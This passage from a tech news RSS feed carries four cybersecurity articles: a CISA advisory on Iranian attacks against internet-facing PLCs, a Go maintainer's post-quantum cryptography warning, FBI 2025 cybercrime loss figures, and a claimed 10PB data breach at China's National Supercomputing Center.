                                <p>Iranian hackers are responding to the recent Iran-U.S. war with cyber attacks on critical American infrastructure, using vulnerabilities in systems used at water and energy companies, the U.S. has warned. The warning, released by the Cybersecurity and Infrastructure Security Agency this week, suggests that the Iranian attacks are focused on “internet-facing operational technology,” specifically programmable logic controllers, which allow them to gain a foothold and to cause disruption.</p><p>The CISA is now advising that affected organizations should begin to “urgently review” the guidance and to remove potentially exploitable controllers, specifically those made by Rockwell Automation and Allen-Bradley, from “direct internet exposure” using secure gateways and firewalls. The guidance also recommends auditing access logs for suspicious traffic across several ports, particularly 44818, 2222, 102, and 502.</p><p>The threat is serious enough that several U.S. agencies, including the FBI and NSA, are warning that organizations involved in critical infrastructure are at real risk. It’s no coincidence that the alert follows on from recent U.S. and Israeli military action against Iran who, in response, has placed IT companies in the region in their crosshairs, from <a href="https://www.tomshardware.com/tech-industry/artificial-intelligence/iran-claims-it-has-hit-oracle-data-center-in-dubai-amazon-data-center-in-bahrain-country-has-threatened-to-attack-nvidia-intel-and-others-too">direct strikes on Oracle and Amazon data centers</a> to <a href="https://www.tomshardware.com/tech-industry/iran-issues-direct-strike-threat-to-nvidia-microsoft-apple-google-14-other-us-tech-companies-these-companies-should-expect-destruction-of-their-facilities-in-response-to-each-act-of-terror-in-iran">further threats to attack 14 other U.S. companies like Microsoft, Apple, and Google</a> across the Middle East.</p><p>The <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa26-097a" target="_blank">April 7, 2026 CISA guidance</a> lists the “widespread use” of these programmable logic controllers in several critical industries as a direct threat. The report notes that “malicious interactions” have, in some instances, caused “the manipulation of data” which, “in a few cases” has led to operational downtime and financial loss.</p><p>While CISA doesn’t mention a specific hacking group, it has <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-335a">previously issued warnings about CyberAv3ngers</a>, a group affiliated with Iran’s hardline Islamic Revolutionary Guard Corps, who it reported using similar exploits in 2024. Several sectors vital to the U.S. economy, including water, energy, and local municipal services, are considered at risk.</p><p>The guidance lists several IP addresses, collated by the FBI, that are believed to have been used by the group over different time periods, up to and including March 2026. Several attack vectors, including Rockwell Automation’s programming software Studio 5000 Logix Designer, are mentioned, along with common access ports and remote access tools that it has seen deployed on vulnerable devices, including Dropbear SSH software using port 22.</p><p>The advice for organizations that could be at risk is simple: double-check your logs and protect your devices. Among “immediate steps” it recommends to stop future attacks is to limit public-facing internet access to any vulnerable hardware and to use physical switch modes that limit programming or remote access on any PLCs that have the functionality. </p><p>Firewalls should be configured to block traffic on common ports, and unused remote access methods and services should be switched off. Organizations using Rockwell Automation/Allen-Bradley PLCs are also advised to review “previously issued guidance” from the manufacturers to protect them against further cyber threats, where possible.</p><p>As CISA’s past guidance shows, cyber attacks from nations such as Iran, Russia, and North Korea are hardly new phenomena. In an era of ever-growing global insecurity, this CISA alert is a timely reminder for those involved in protecting critical infrastructure to harden their systems because, when you’re connected to the internet, every connected system is suddenly at risk to hackers living thousands of miles away.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Go maintainer joins collective klaxon about encryption-breaking quantum computers — developer urges immediate switch to post-quantum methods to prevent worldwide disaster ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/go-maintainer-joins-collective-klaxon-about-encryption-breaking-quantum-computers-developer-urges-immediate-switch-to-post-quantum-methods-to-prevent-worldwide-disaster</link>
                                                                            <description>
                            <![CDATA[ Go maintainer joins collective klaxon about encryption-breaking quantum computers and urges immediate switch to post-quantum methods to prevent disaster. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">oWU6HQGnMW3uuuMkkmWRmg</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/htHQLBnnmsjKyAaj9C44uD-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Thu, 09 Apr 2026 10:40:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                <author><![CDATA[ editors@tomshardware.com (Bruno Ferreira) ]]></author>                    <dc:creator><![CDATA[ Bruno Ferreira ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/ZQiPPaXaAuQ4VrVEYnnR7G.png ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Bruno Ferreira&#039;s journey kicked off with the venerable ZX Spectrum, a cassette player, and his hopes and dreams. He quickly realized he had more fun figuring out how computers work than he did actually using the things. Kicking off a developer career with C and Assembly before moving to scripting languages, he&#039;s worn many hats, including both database architect and systems administration. As a teen, Bruno co-founded a web development outfit where he was for 17 years before moving on to spend nearly a decade at The Tech Report as a writer, editor, and (of course) developer. In this decade, he&#039;s been at Asus, MLCommons, and HotHardware, among others. When not fiddling with computers and games, his love for music and production sends him off to live shows and festivals. Occasionally, he pretends he can play the guitar and bass.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/htHQLBnnmsjKyAaj9C44uD-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Quantum computers]]></media:description>                                                            <media:text><![CDATA[Quantum computers]]></media:text>
                                <media:title type="plain"><![CDATA[Quantum computers]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/htHQLBnnmsjKyAaj9C44uD-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>With all the talk about AI slurping computing and energy resources — plus all the interesting times lived in the Middle East and Ukraine — there's a serious world issue that's flying under the radar. Quantum computers might be breaking most — or all — current cryptography in an estimated three years, and not nearly enough is being done. Filippo Valsorda, the current maintainer of the cryptography library in the Go language and former lead of the Go Security team at Google, is <a href="https://words.filippo.io/crqc-timeline/">adding his voice</a> to the choir of alerts.</p><div  class="fancy-box"><div class="fancy_box-title">Go deeper with TH Premium: Memory</div><div class="fancy_box_body"><figure class="van-image-figure "  ><div class='image-full-width-wrapper'><div class='image-widthsetter' ><p class="vanilla-image-block" style="padding-top:56.25%;"><img id="xi79WuWDZXzix4Fc7sXNMn" name="hbm-vs" caption="" alt="HBM3E vs HBM4" src="https://cdn.mos.cms.futurecdn.net/xi79WuWDZXzix4Fc7sXNMn.png" mos="" link="" align="" fullscreen="" width="" height="" attribution="" endorsement="" class="pinterest-pin-exclude"></p></div></div><figcaption itemprop="caption description" class=""><span class="credit" itemprop="copyrightHolder">(Image credit: SK Hynix)</span></figcaption></figure><p class="fancy-box__body-text"><ul><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/pc-components/storage/perfect-storm-of-demand-and-supply-driving-up-storage-costs" target="_blank">AI data centers are swallowing the world's memory and storage supply</a></li><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/pc-components/ram/the-future-of-dram-from-ddr5-advancements-to-future-ics" target="_blank">The future of DRAM: From DDR5 to future ICs</a></li><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/tech-industry/semiconductors/hbm-roadmaps-for-micron-samsung-and-sk-hynix-to-hbm4-and-beyond" target="_blank">High-bandwidth memory roadmap</a></li><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/pc-components/ram/hbm-is-eating-your-ram" target="_blank">Here's why HBM is coming for your PC's RAM</a></li></ul></p></div></div><p>Valsorda's exposé builds on other contemporary reports about the situation, including a days-old report in which Google's engineers point out that all cryptocurrency <a href="https://www.tomshardware.com/tech-industry/cyber-security/google-research-suggests-encryption-technique-used-by-bitcoin-will-be-cracked-by-quantum-computers-around-2029-search-giant-says-quantum-attacks-need-to-be-prepared-for-now">will suffer a quick explosion</a>. For months, the Go developer was readying a post about deploying post-quantum (PQ, or quantum-computer-proof) cryptographic key exchanges at a relatively leisurely pace to give the software and hardware system time to adapt.<br><br>However, in his own words: "that other article is now wrong [...] we don't have the time if we need to be finished by 2029 instead of 2035." Valsorda goes on to state that "it makes no more sense to deploy new schemes that are not post-quantum", while simultaneously acknowledging that adding PQ to extant infrastructure is hard and frustrating, particularly as the move to the currently used ECC (Elliptic Curve Cryptography) itself took long enough.<br><br>Valsorda states the computing world must be ready for a fast "hard cut," rather than relying on extended-schedule transitional solutions. The engineer doesn't mince words, saying that "any non-PQ key exchange should now be considered a potential active compromise," and adding that "hybrid classic+post-quantum authentication makes no sense [...] and will only slow us down."<br><br>These hybrid "band-aids" are suggested as stopgaps due to the fact that PQ key exchanges take up a ton more space than conventional ECC methods. One such example is your bog-standard secure website connection using a digital certificate (X.509 format), whose key exchange requires only some tens of bytes for transmitting signatures with ECC.<br><br>When switching to PQ, that figure easily grows to multiple kilobytes, increasing bandwidth, and, perhaps most importantly, latency — particularly when accessing a certificate chain containing multiple signatures. There are workarounds for this, such as <a href="https://security.googleblog.com/2026/02/cultivating-robust-and-efficient.html">Merkle Tree Certificates</a>, but those will take a while to implement worldwide.<br><br>Although X.509 certificates are a worst-case scenario, the problem extends to just about any area of computing you can think of: secure shell connections (OpenSSH already alerts users if they're not using PQ key exchange), code signing, secure DNS, email signatures, and the blockchain. Many IoT devices, for example, tend to run with very limited memory and storage, so they might not be able to even use PQ effectively at all.<br><br>Valsorda calls out some particularly troublesome examples. Intel's SGX and AMD SEV-SNP trusted execution environments will be fully broken, and encrypted files are a prime target, as data using today's encryption methods will potentially be easily broken tomorrow. You can read the <a href="https://words.filippo.io/crqc-timeline/">entire article here</a> for all the technical details.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ $21 billion stolen from more than 1 million Americans due to cybercrime in 2025 — $11 billion come from stolen crypto, $8.6 billion taken from investment scams, while AI-related attacks cost $893 million ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/usd21-billion-stolen-from-more-than-1-million-americans-due-to-cybercrime-in-2025-usd11-billion-come-from-stolen-crypto-usd8-6-billion-taken-from-investment-scams-while-ai-related-attacks-cost-usd893-million</link>
                                                                            <description>
                            <![CDATA[ The FBI breaks down the $21 billion lost by over a million Americans through online scams, with more than half involving cryptocurrency. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">cMdQghS7Ng7qUqJugVMsJc</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/9YYr49MBVeBobTPW7raJWK-1280-80.png" type="image/png" length="0"></enclosure>
                                                                        <pubDate>Thu, 09 Apr 2026 10:00:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                <author><![CDATA[ editors@tomshardware.com (Jowi Morales) ]]></author>                    <dc:creator><![CDATA[ Jowi Morales ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/gM7E2WSDg2wgCFoaDPz9yK.jpg ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Jowi Morales is a writer and journalist covering the tech beat since 2021. However, he’s been interested in technology far earlier than that. He started discovering desktop computers when his father brought home a Windows 95 PC, but his first real experience working under the hood of the PC was when the old computer’s hard drive was filled to the brim in the year 2000. He deleted the Windows folder to attempt to rectify the situation, which led to his dad buying a new desktop PC. Since then, he learned a lot more about computers, and he’s always been the go-to tech expert for his family and friends.&lt;/p&gt;&lt;p&gt;Jowi primarily uses a Windows workstation and an Android phone, but he also bought into the Apple ecosystem with the 6th-gen iPad, iPhone 14 Pro Max, and the M1 MacBook Air. Today, Jowi covers hardware and software from Redmond and Cupertino, while also looking at the tech industry in general.&lt;/p&gt;&lt;p&gt;Aside from covering technology, Jowi is an avid photographer and writes about automobiles, aviation, and tanks. You can find his bylines at &lt;a href=&quot;https://www.makeuseof.com/author/jowi-morales/&quot;&gt;MakeUseOf&lt;/a&gt;, &lt;a href=&quot;https://www.slashgear.com/author/jowimorales/&quot;&gt;SlashGear&lt;/a&gt;, and, of course, &lt;a href=&quot;https://www.tomshardware.com/author/jowi-morales&quot;&gt;Tom’s Hardware&lt;/a&gt;.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/png" url="https://cdn.mos.cms.futurecdn.net/9YYr49MBVeBobTPW7raJWK-1280-80.png">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[a hacker calling a scam victim]]></media:description>                                                            <media:text><![CDATA[a hacker calling a scam victim]]></media:text>
                                <media:title type="plain"><![CDATA[a hacker calling a scam victim]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/9YYr49MBVeBobTPW7raJWK-1280-80.png" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>The Federal Bureau of Investigation (FBI) has reported that Americans lost almost $21 billion due to cybercrime in 2025 — a 26% increase from the previous year, with the number of victims surpassing one million people. According to the agency’s report [<a href="https://www.ic3.gov/AnnualReport/Reports/2025_IC3Report.pdf">PDF</a>], $11.366 billion of these losses involved cryptocurrency, with 181, 565 complaints filed at the Internet Crime Complaint Center (IC3). The agency also determined that scammers have started using AI to create deepfake videos and fake social profiles, as well as clone voices and IDs, with $893 million lost in related attacks. </p><p>Most of the amount was stolen through investment scams, which cost $8.64 billion, while $3 billion was lost due to business email compromise. Losses due to tech/customer support scams reached more than $2.1 billion, while losses due to personal data breaches amounted to $1.3 billion. The top five are rounded up by confidence/romance scams, which cost victims $929 million. </p><p>This is the largest amount lost and the greatest number of people affected by online scams, according to IC3’s history. Cryptocurrency was also used in more than half of the amount lost, especially because of how easy it is for criminals to launder the stolen funds and make them difficult or impossible to recover. In fact, the FBI reported that <a href="https://www.tomshardware.com/tech-industry/cryptocurrency/americans-lost-usd333-million-to-bitcoin-atm-fraud-in-2025-fbi-says-there-is-a-clear-and-constant-rise-of-this-scam-and-that-it-is-not-slowing-down">more than $333 million was lost</a> last year via Bitcoin ATMs, with most victims aged more than 60 years old. Note that the report does not include cryptocurrency stolen from platforms, like the <a href="https://www.tomshardware.com/tech-industry/cyber-security/usd40-million-worth-of-crypto-stolen-from-step-finance-hackers-compromise-executives-devices-to-gain-illicit-access">$40 million taken from Step Finance</a> and <a href="https://www.tomshardware.com/tech-industry/cryptocurrency/crypto-platform-drift-suffers-from-hack-suspected-to-total-usd270-million-firm-goes-into-damage-control-mode-suspends-deposits-and-withdrawals">$270 million Drift is suspected to have lost</a> in attacks earlier this year. Instead, the $11.366 billion figure relates to scam losses that were transacted in BTC, ETH, and other cryptocurrencies directly from individuals.</p><p>Nevertheless, U.S. authorities are taking steps to reduce the losses and the number of victims. The IC3 established the Recovery Asset Team (RAT) in 2018, which would initiate a Financial Fraud Kill Chain (FFKC) when complaints are filed as quickly as possible. The group has addressed 3,900 incidents through the FFKC, freezing more than $678 million in stolen funds. Unfortunately, the agency has its work cut out, especially as technological advancements like AI make it easier for scammers to victimize people, especially older ones who are unfamiliar with these new tech.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ 10 petabytes of sensitive data stolen from China's National Supercomputing Center, hackers claim — daring heist would be largest ever China hack, covering 6,000 clients across science, defense, and beyond ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/10-petabytes-of-sensitive-data-stolen-from-chinas-national-supercomputing-center-hackers-claim-daring-heist-would-be-largest-ever-china-hack-covering-6-000-clients-across-science-defense-and-beyond</link>
                                                                            <description>
                            <![CDATA[ Hacker or hacker group steals secret data concerning aerospace engineering, bioinformatics, fusion modeling from China's National Supercomputing Center. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">dAuKEiJEC7ficTe2LV2ra4</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/foLY3NDKc2g2zqjwGgXPvc-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Thu, 09 Apr 2026 09:42:50 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                <author><![CDATA[ ashilov@gmail.com (Anton Shilov) ]]></author>                    <dc:creator><![CDATA[ Anton Shilov ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/uMZ5kNphxA2Ut6whdLaSQV.png ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Anton Shilov has been in the PC industry since 1990s playing games, building PCs, and writing stories about pretty much everything that relates to PCs, Macs, smartphones, tablets, and even fab equipment. Over his career, he has worked at a variety of high-ranking websites, including AnandTech, EE Times, TechRadar, X-bit labs, and now Tom&#039;s Hardware. When Anton is not reading or writing about something high-tech, he is probably watching a good movie, playing a video game, or spending time with his family.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/foLY3NDKc2g2zqjwGgXPvc-1280-80.jpg">
                                                            <media:credit><![CDATA[Intel]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[A security specialist]]></media:description>                                                            <media:text><![CDATA[A security specialist]]></media:text>
                                <media:title type="plain"><![CDATA[A security specialist]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/foLY3NDKc2g2zqjwGgXPvc-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>A hacker (or hacker group) claims to have extracted more than 10 petabytes (1PB = 1000 TB) of highly sensitive information from China's National Supercomputing Center (NSCC) in Tianjin, which could be the largest known data breach involving Chinese infrastructure. Although the incident remains unverified, its nature and scale — data was stolen from 6,000 state-controlled entities — may point to a systemic weakness in China's critical infrastructure, which has serious implications, reports <a href="https://edition.cnn.com/2026/04/08/china/china-supercomputer-hackers-hnk-intl" target="_blank" rel="nofollow">CNN</a>.</p><p>The dataset is said to originate from China's National Supercomputing Center, a centralized high-performance computing facility that supports over 6,000 entities from research, industrial, and defense sectors. Indeed, the alleged content spans multiple disciplines, including aerospace engineering, bioinformatics, fusion modeling, and other fields studied using supercomputer simulations. The individual or group behind the breach, which goes by the name of FlamingChina, released a sample in a Telegram channel in February, claiming the archive contains research tied to such organizations as the Aviation Industry Corporation of China (AVIC), the Commercial Aircraft Corporation of China (COMAC), and the National University of Defense Technology. </p><p>The exposed materials include files labeled 'secret' in Chinese, along with engineering documentation, simulation results, and rendered models tied to weapons systems such as bombs and missiles, according to analysts who reviewed portions of the leak. Access to portions of the dataset is reportedly being sold for thousands of dollars in cryptocurrency, while full access is priced at hundreds of thousands of dollars.</p><p>The scale of the alleged breach raises questions about the attacker and represents a significant interest from an intelligence point of view. First up, stealing 10PB of data undetected requires exceptional skills, plenty of time (six months), and dedication. Secondly, processing 10PB of data requires significant computing resources that are not usually available to individuals or hacking groups. Thirdly, given the requirements for significant computing capabilities, meaningful analysis of the dataset can indeed be limited to governments or large organizations. Yet, researchers questioned by CNN suggested that while global governments may show interest in such data, some may already possess the information through other means.</p><p>According to the alleged attacker, they gained access through a compromised VPN domain, then deployed a botnet to extract data. Instead of transferring data in bulk, the attacker distributed the exfiltration across multiple systems and moved 'smaller' amounts over about six months to avoid detection. Such a method relies more on exploiting system architecture than on advanced hacking techniques, which in part helped the perpetrator to avoid detection. </p><p>Although <em>CNN</em> could not confirm the source of the leak or whether it was real, multiple cybersecurity experts say that the samples appear authentic and match what they would expect to see from a centralized supercomputing facility. If the attack is real, the incident highlights ongoing cybersecurity weaknesses in China's critical infrastructure, which means that some of its secret technologies can end up in the hands of foreign governments or terrorist organizations, which may use them to harm not only China but other countries as well.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
            </channel>
</rss>